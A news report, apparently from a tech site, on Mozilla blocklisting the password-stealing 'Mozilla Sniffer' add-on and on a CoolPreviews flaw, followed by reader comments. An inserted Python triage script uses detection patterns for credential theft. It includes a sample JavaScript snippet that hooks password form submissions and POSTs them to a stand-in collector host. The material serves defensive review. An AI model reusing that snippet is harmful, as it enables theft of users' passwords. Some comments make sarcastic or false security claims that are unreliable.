Mozilla blacklists password theft add-on



Mozilla has yanked a password-stealing browser add-on after the discovery that the add-on contains code that intercepts login data submitted to any website and sends this data to a remote location.

The add-on, called "Mozilla Sniffer," was uploaded to the addons.mozilla.org site on June 6. "Upon discovery on July 12th, the add-on was disabled and added to the blocklist, which will prompt the add-on to be uninstalled for all current users," Mozilla explained.

The intercepted data included user passwords:

If a user installs this add-on and submits a login form with a password field, all form data will be submitted to a remote location. Uninstalling the add-on stops this behavior. Anybody who has installed this add-on should change their passwords as soon as possible.

The open-source group said Mozilla Sniffer had been downloaded approximately 1,800 times and reported 334 active daily users.

All current users of the malicious add-on will receive an uninstall notification.

Mozilla Sniffer was not developed by Mozilla, and it was not reviewed by Mozilla. The add-on was in an experimental state, and all users that installed it should have seen a warning indicating it is unreviewed. Unreviewed add-ons are scanned for known viruses, trojans, and other malware, but some types of malicious behavior can only be detected in a code review.
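The distinction Mozilla draws above, between a malware signature scan and a human code review, is the key point for anyone vetting extensions. The script below is an added example, not Mozilla's own tooling: a heuristic triage pass that flags add-on scripts combining the two behaviours the article describes (hooking form submissions or reading password fields, and sending data to a remote host), so a reviewer looks at those first. The three sample scripts and the `collector.invalid` URL are constructed for the example.

```python
"""Heuristic static triage of browser add-on scripts.

Added example (not Mozilla's blocklist or review tooling). It surfaces
scripts that both touch credentials/form submissions and send data off
the machine, the pattern described for "Mozilla Sniffer". A hit is a
prompt for human code review, not a verdict.
"""
import re
from typing import Dict, List

# Each indicator alone is common in benign add-ons (a header viewer sends
# nothing; a preview add-on fetches pages). The combination of credential
# access and a remote send is what a reviewer wants surfaced first.
INDICATORS = [
    ("form_submit_hook", re.compile(r'addEventListener\(\s*["\']submit["\']|\.onsubmit\s*=')),
    ("password_field_access", re.compile(r'type\s*=\s*["\']password["\']|\[type=["\']?password["\']?\]')),
    ("remote_send", re.compile(r'XMLHttpRequest|\.open\(\s*["\']POST["\']|\bfetch\(|\.send\(')),
    ("hardcoded_remote_url", re.compile(r'https?://[A-Za-z0-9.-]+\.[A-Za-z]{2,}[^\s"\']*')),
]


def triage_script(source: str) -> dict:
    """Return which indicators fire, any literal URLs, and a review flag."""
    hits = {label: bool(pat.search(source)) for label, pat in INDICATORS}
    urls = INDICATORS[3][1].findall(source)
    # Credential-shaped input plus an outbound channel: needs a human look.
    exfil = hits["remote_send"] and (hits["form_submit_hook"] or hits["password_field_access"])
    return {"indicators": hits, "urls": sorted(set(urls)), "needs_review": exfil}


def triage_package(scripts: Dict[str, str]) -> List[dict]:
    """Triage every script in an add-on, most suspicious first."""
    results = []
    for name, src in scripts.items():
        r = triage_script(src)
        r["script"] = name
        results.append(r)
    results.sort(key=lambda r: (not r["needs_review"],
                                -sum(r["indicators"].values()),
                                r["script"]))
    return results


# Constructed sample scripts (assumptions for the example, not real add-ons).
SNIFFER = '''
// hooks every submitted form with a password field and posts it elsewhere
document.addEventListener("submit", function (e) {
  var pw = e.target.querySelector("input[type=password]");
  if (!pw) return;
  var xhr = new XMLHttpRequest();
  xhr.open("POST", "http://collector.invalid/log", true);
  xhr.send(new FormData(e.target));
}, true);
'''

HEADER_VIEWER = '''
// inspects request headers locally, sends nothing over the network
var observer = {
  observe: function (subject, topic) {
    var channel = subject.QueryInterface(Components.interfaces.nsIHttpChannel);
    log(channel.getRequestHeader("User-Agent"));
  }
};
'''

PREVIEW = '''
// fetches a page for a hover preview: remote traffic, but no credential access
function loadPreview(url) {
  fetch(url).then(function (r) { return r.text(); }).then(render);
}
'''

SAMPLE_PACKAGE = {"sniffer.js": SNIFFER, "headers.js": HEADER_VIEWER, "preview.js": PREVIEW}


if __name__ == "__main__":
    for r in triage_package(SAMPLE_PACKAGE):
        fired = [k for k, v in r["indicators"].items() if v]
        print(f'{r["script"]:12} review={r["needs_review"]!s:5} indicators={fired} urls={r["urls"]}')
```

Run as-is and the sniffer sample sorts to the top with all four indicators and its hard-coded collector URL, the preview sample shows a remote send only, and the header viewer fires nothing. Regex heuristics are easy to evade with obfuscation, which is exactly why Mozilla's statement says some behaviour is only caught by reading the code.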


Mozilla plans to implement a new security model for addons.mozilla.org that will require all add-ons to be code-reviewed before they are available on the site.

Mozilla said a second add-on, called CoolPreviews, contains a vulnerability that exposes users to hacker attack.

[The] vulnerability can be triggered using a specially crafted hyperlink. If the user hovers the cursor over this link, the preview function executes remote JavaScript code with local chrome privileges, giving the attacking script control over the host computer. Version 3.0.1 and all older versions have been disabled on addons.mozilla.org, and a fixed version was uploaded and reviewed within a day of the developer being notified.


"If a user has a vulnerable version installed and clicks on a malicious link that targets the add-on, the code in the malicious link will run with local privileges, potentially gaining access to the file system and allowing code download and execution," the group warned.

About 177,000 users have a vulnerable version of CoolPreviews installed. Mozilla plans to blacklist the vulnerable versions soon.


Talkback

12 comments
  • Nope, sorry, I don't believe you ...

    ... I mean, how can this possibly have happened.

    Everyone knows that all OSS is thoroughly reviewed and vetted by all OSS consumers and contributors and that many eyes ensure that no bugs nor deliberate malware can possibly creep into an OSS source tree, right?

    Right.
    de-void-21165590650301806002836337787023
  • Who were...

    the 1800 people who downloaded it, and who are the 334 people who are using it? Why? Is it masked as doing something else? If I uploaded a plug-in called Mozilla Format-your-system-drive, would I actually get people to download and use it?
    hickum
    • RE: Mozilla blacklists password theft add-on

      @hickum
      No doubt, people are stupid.
      ryanstrassburg
    • RE: Mozilla blacklists password theft add-on

      @hickum
      As the original article explains, the add-on was based on Tamper Data - an extension that allows you to view and manipulate HTTP headers of requests made by webpages. It is pretty popular among web developers and security experts. And - yes, it is a sniffer. So when somebody saw an add-on with the same functionality called Mozilla Sniffer it made sense.
      Wladimir Palant
  • Yet another reason to use Safari

    Once again, the Mozilla Foundation gives Apple users yet another reason to use Safari. The plugin model recently adopted by Apple is completely unbreakable, and would never lead to such information loss.
    Trolleur
    • yeah except

      when u use safari with your left hand it fails to load webpages..... unless u wear a glove. nice try
      bspurloc
    • What a farce...

      @Trolleur
      Nothing is unbreakable. But we shall see won't we...
      ryanstrassburg
      • Let me know when there's an exploit....

        @ryanstrassburg

        Please let me know when there is any exploit for Safari extensions, and I'll buy you a beer. In fact, let me know when there's an active exploit for any issue in Mac OS X. The fact of the matter here is that OS X is 100% safe and secure, so long as users don't use third-party software like Firefox.
        Trolleur
      • RE: Mozilla blacklists password theft add-on

        @Trolleur - I sincerely hope that your statements were dripping with disdainful sarcasm. If not, you seriously need a checkup from the neck up.
        de-void-21165590650301806002836337787023
  • RE: Mozilla blacklists password theft add-on

    How stupid can people get? Important passwords are memorised or written down & kept in a safe place (safe or where you keep money), NEVER on a computer!
    ronangel
    • RE: Mozilla blacklists password theft add-on

      @ronangel - RIGHT ON ... because, as we all know, writing down your passwords on a piece of paper that you stick to the underside of your keyboard or hide in your wallet are utterly secure and will never be stolen.

      On the other hand, storing your passwords ANYWHERE (either electronically or on paper, etc) in plaintext is just silly.
      de-void-21165590650301806002836337787023